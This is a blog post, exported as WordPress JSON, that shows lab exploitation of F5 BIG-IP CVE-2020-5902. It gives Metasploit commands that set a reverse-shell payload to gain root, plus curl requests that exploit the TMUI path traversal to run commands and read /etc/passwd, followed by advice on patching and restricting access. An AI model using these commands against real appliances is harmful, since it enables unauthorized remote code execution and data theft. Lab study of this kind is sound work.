{"id":833,"date":"2020-08-23T15:43:34","date_gmt":"2020-08-23T07:43:34","guid":{"rendered":"https:\/\/www.insecurewire.com\/?p=833"},"modified":"2020-08-23T15:43:34","modified_gmt":"2020-08-23T07:43:34","slug":"f5-cve-2020-5902-traffic-management-ui-remote-code-execution","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/","title":{"rendered":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution"},"content":{"rendered":"

F5 load balancers are wildly popular so when this bug was publicly disclosed back in June it was a big deal. F5 was prompt to release patches for CVE-2020-5902 <\/a>remote code execution within the Traffic Management User Interface of BIG-IP code. It’s a quiet Sunday afternoon so lets lab this vulnerability:<\/p>\n

1. Setup<\/strong>
\nFirst off you will need a vulnerable F5 Big-IP Appliance (in this example we are running BIG-IP 13.1.0.2). I am running this lab in VMware Workstation on Windows. You will also need a Kali 2020 VM up to date. For simplicity sake make sure both the F5 VM and the Kali VM are on the same subnet.<\/p>\n

2. Update<\/strong>
\nOnce you have the lab setup fire up your Kali VM and be sure to update metasploit with:
\napt update && apt upgrade<\/code>
\nThen launch metasploit:
\nmsf5 > reload_all<\/code>
\nThis will update modules within Metasploit from the apt upgrade you just completed.<\/p>\n

3. Exploiting<\/strong>
\nLets fire up Metasploit and set our exploit up:
\nmsfconsole
\nmsf5 > use exploit\/linux\/http\/f5_bigip_tmui_rce
\nmsf5 exploit(linux\/http\/f5_bigip_tmui_rce) > set payload linux\/x64\/shell_reverse_tcp
\nmsf5 exploit(linux\/http\/f5_bigip_tmui_rce) > set LHOST 10.0.0.10
\nmsf5 exploit(linux\/http\/f5_bigip_tmui_rce) > set RHOST 10.0.0.199
\nmsf5 exploit(linux\/http\/f5_bigip_tmui_rce) > run
\n<\/code><\/p>\n

OK so what did we do here? First off we set the exploit to use the remote code module for the F5 vulnerability. Then I proceeded to set the LHOST (Kali VM) and the RHOST (F5 VM) variables. Lastly we use the command ‘run’ to execute.
\n\"F5<\/a>
\nAs you can see above the sucessful output using the shell_reverse_tcp payload. I run the command ‘whoami’ to confirm root access to the F5 Linux based OS.<\/p>\n

By default the f5_bigip_tmui_rce module within Metasploit will use the meterpeter payload (linux\/x64\/meterpreter\/reverse_tcp). I just found that one to not always be as reliable. Sometimes you have to execute the exploit serveral times for it connect back. Below is the output of using that payload, which with meterpreter has built in commands:
\n\"F5<\/a>
\nAbove you can see the meterpreter output, I run the sysinfo command then drop to a shell and run some linux commands (whoami, pwd, uname -a).<\/p>\n

4. Mitigation<\/strong>
\nUse this<\/a> Indicators of Compromise script to check if your F5 was hit. This shell script was created by F5.
\nFirst and foremost – patch your version of the F5 BIG-IP software. If you have the VM appliances or physical hardware the process is generally the same:
\n1. Download the patched ISO (make sure the checksum matches, I can’t stress this enough). Install the ISO on a free \/ HA partition.
\n2. Re-activate your software license PRIOR to switching versions. Then switch versions installing the config.
\nLock down the TMUI<\/a> to source subnets that need access. Deny all other connections.<\/p>\n

5. Bonus<\/strong>
\nYou can also use curl to test this vulnerability:
\nRCE:<\/strong>
\ncurl -v -k 'https:\/\/[F5 Host]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/tmshCmd.jsp?command=list+auth+user+admin'<\/code>
\nRead File:<\/strong>
\ncurl -v -k 'https:\/\/[F5 Host]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/fileRead.jsp?fileName=\/etc\/passwd'<\/code>
\nList File:<\/strong>
\ncurl -v -k 'https:\/\/[F5 Host]\/tmui\/login.jsp\/..;\/tmui\/locallb\/workspace\/directoryList.jsp?directoryPath=\/usr\/local\/www\/'<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"

F5 load balancers are wildly popular so when this bug was publicly disclosed back in June it was a big deal. F5 was prompt to…<\/p>\n","protected":false},"author":2,"featured_media":837,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,3],"tags":[56,79,101,122],"class_list":["post-833","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-load-balancer","tag-attack","tag-cve-2020-5902","tag-f5","tag-kali"],"acf":[],"yoast_head":"\nF5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"F5 load balancers are wildly popular so when this bug was publicly disclosed back in June it was a big deal. F5 was prompt to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2020-08-23T07:43:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1010\" \/>\n\t<meta property=\"og:image:height\" content=\"530\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution\",\"datePublished\":\"2020-08-23T07:43:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\"},\"wordCount\":437,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png\",\"keywords\":[\"Attack\",\"CVE-2020-5902\",\"F5\",\"Kali\"],\"articleSection\":[\"Attack\",\"Load Balancer\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\",\"name\":\"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png\",\"datePublished\":\"2020-08-23T07:43:34+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png\",\"width\":1010,\"height\":530,\"caption\":\"F5 Meterpreter Output\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/","og_locale":"en_US","og_type":"article","og_title":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire","og_description":"F5 load balancers are wildly popular so when this bug was publicly disclosed back in June it was a big deal. F5 was prompt to...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/","og_site_name":"Insecure Wire","article_published_time":"2020-08-23T07:43:34+00:00","og_image":[{"width":1010,"height":530,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png","type":"image\/png"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution","datePublished":"2020-08-23T07:43:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/"},"wordCount":437,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png","keywords":["Attack","CVE-2020-5902","F5","Kali"],"articleSection":["Attack","Load Balancer"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/","url":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/","name":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png","datePublished":"2020-08-23T07:43:34+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2020\/08\/meterpreter.png","width":1010,"height":530,"caption":"F5 Meterpreter Output"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2020\/08\/23\/f5-cve-2020-5902-traffic-management-ui-remote-code-execution\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"F5 CVE-2020-5902 Traffic Management UI Remote Code Execution"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/833","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=833"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/833\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/837"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=833"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=833"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=833"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}